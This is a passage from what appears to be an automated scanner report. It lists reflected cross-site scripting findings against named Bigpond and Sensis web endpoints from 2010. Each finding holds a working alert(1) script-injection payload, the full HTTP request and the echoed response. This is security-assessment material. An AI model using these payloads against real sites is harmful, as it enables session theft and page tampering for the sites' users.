GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=34680943</script><script>alert(1)</script>9695fac6a30&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:14:31 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 9027

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
;
var clientOs                = (ua.indexOf("macintosh") != -1 || ua.indexOf("mac os x") != -1) ? "MacOs" : "Windows";
var rand                    = 1;
var totalItemCount            = (os != 'MacOs') ? 3 : 7;
var videoWidth                = "34680943</script><script>alert(1)</script>9695fac6a30";
var videoHeight                = "272";
var windowLess                = (1 == 1) ? true : false;
var adMessage                = "";


if(controlsType == 'external')
   totalItemCount--;


function itemLoaded(){
   loadedItemCou
...[SNIP]...

2.582. http://iad.bigpondvideo.com/indexInfinityPlayer.php [width parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the width request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c02ea</script><script>alert(1)</script>17e55b357fa was submitted in the width parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346c02ea</script><script>alert(1)</script>17e55b357fa&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:14:36 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 9027

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
<script type="text/javascript">
           createSilverlight('346c02ea</script><script>alert(1)</script>17e55b357fa', '297', 'silverlightPlayer');
       </script>
...[SNIP]...

2.583. http://iad.bigpondvideo.com/indexInfinityPlayer.php [windowless parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the windowless request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66af8</script><script>alert(1)</script>be71be31e was submitted in the windowless parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=166af8</script><script>alert(1)</script>be71be31e&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:13:33 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8721

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
dback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=166af8</script><script>alert(1)</script>be71be31e&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvid
...[SNIP]...

2.584. http://iad.bigpondvideo.com/indexInfinityPlayer.php [windowless parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the windowless request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 87988%3balert(1)//d08e1f18268 was submitted in the windowless parameter. This input was echoed as 87988;alert(1)//d08e1f18268 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=187988%3balert(1)//d08e1f18268&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:13:34 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8658

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
ua.indexOf("mac os x") != -1) ? "MacOs" : "Windows";
var rand                    = 1;
var totalItemCount            = (os != 'MacOs') ? 3 : 7;
var videoWidth                = "346";
var videoHeight                = "272";
var windowLess                = (187988;alert(1)//d08e1f18268 == 1) ? true : false;
var adMessage                = "";


if(controlsType == 'external')
   totalItemCount--;


function itemLoaded(){
   loadedItemCount++;
   if(loadedItemCount == totalItemCount){
       asset
...[SNIP]...

2.585. http://iad.bigpondvideo.com/indexInfinityPlayer.php [wmv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the wmv request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6202a</script><script>alert(1)</script>c49447b2265 was submitted in the wmv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=16202a</script><script>alert(1)</script>c49447b2265&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:13:43 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8677

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
Unmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=16202a</script><script>alert(1)</script>c49447b2265&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&locat
...[SNIP]...

2.586. http://media.sensis.com.au/hserver/acc_random=113168337601/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=254201693891 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=113168337601/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=254201693891

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9827"><script>alert(1)</script>4e5c52ad3d3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hservere9827"><script>alert(1)</script>4e5c52ad3d3/acc_random=113168337601/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=254201693891 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.gamearena.com.au/news/?13b1b'%3E%3Cscript%3Ealert(1)%3C/script%3Edd03f420596=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:55 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 374
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000050d3a649cbdb00000000e9827"><script>alert(1)</script>4e5c52ad3d3/acc_random=113168337601/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=254201693891" target="_new">
...[SNIP]...

2.587. http://media.sensis.com.au/hserver/acc_random=113168337601/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=254201693891 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=113168337601/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=254201693891

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29cb7"><script>alert(1)</script>53acb15f742 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random29cb7"><script>alert(1)</script>53acb15f742=113168337601/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=254201693891 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.gamearena.com.au/news/?13b1b'%3E%3Cscript%3Ealert(1)%3C/script%3Edd03f420596=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:56 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 374
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000050d3a649cbdb00000000/acc_random29cb7"><script>alert(1)</script>53acb15f742=113168337601/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=254201693891" target="_new">
...[SNIP]...

2.588. http://media.sensis.com.au/hserver/acc_random=113168337601/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=254201693891 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=113168337601/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=254201693891

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a24cd"><script>alert(1)</script>bb9cc0d4b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=113168337601/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=254201693891?a24cd"><script>alert(1)</script>bb9cc0d4b2=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.gamearena.com.au/news/?13b1b'%3E%3Cscript%3Ealert(1)%3C/script%3Edd03f420596=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:54 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 376
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000050d3a649cbdb00000000/acc_random=113168337601/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=254201693891?a24cd"><script>alert(1)</script>bb9cc0d4b2=1" target="_new">
...[SNIP]...

2.589. http://media.sensis.com.au/hserver/acc_random=155089197954/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=942103891691 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=155089197954/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=942103891691

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fab5"><script>alert(1)</script>733cc2a069 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver1fab5"><script>alert(1)</script>733cc2a069/acc_random=155089197954/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=942103891691 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://bigpondmusic.com/bphf/header/adh.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: media.sensis.com.au
Proxy-Connection: Keep-Alive
Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:48 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 696
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=000A4F2D31300CEB0148C2DC61626364; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/;
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=00031a9600000000000000001fab5"><script>alert(1)</script>733cc2a069/acc_random=155089197954/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=942103891691/relocate=http://bs.serving-
...[SNIP]...

2.590. http://media.sensis.com.au/hserver/acc_random=155089197954/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=942103891691 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=155089197954/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=942103891691

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c13a"><script>alert(1)</script>5cc2daa8e04 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random8c13a"><script>alert(1)</script>5cc2daa8e04=155089197954/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=942103891691 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://bigpondmusic.com/bphf/header/adh.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: media.sensis.com.au
Proxy-Connection: Keep-Alive
Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:50 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 471
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=000A559831320CEB2513A17761626364; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/;
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=00033b0c0000000000000000/acc_random8c13a"><script>alert(1)</script>5cc2daa8e04=155089197954/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=942103891691/relocate=http://clk.redcated/OMA/go/2
...[SNIP]...

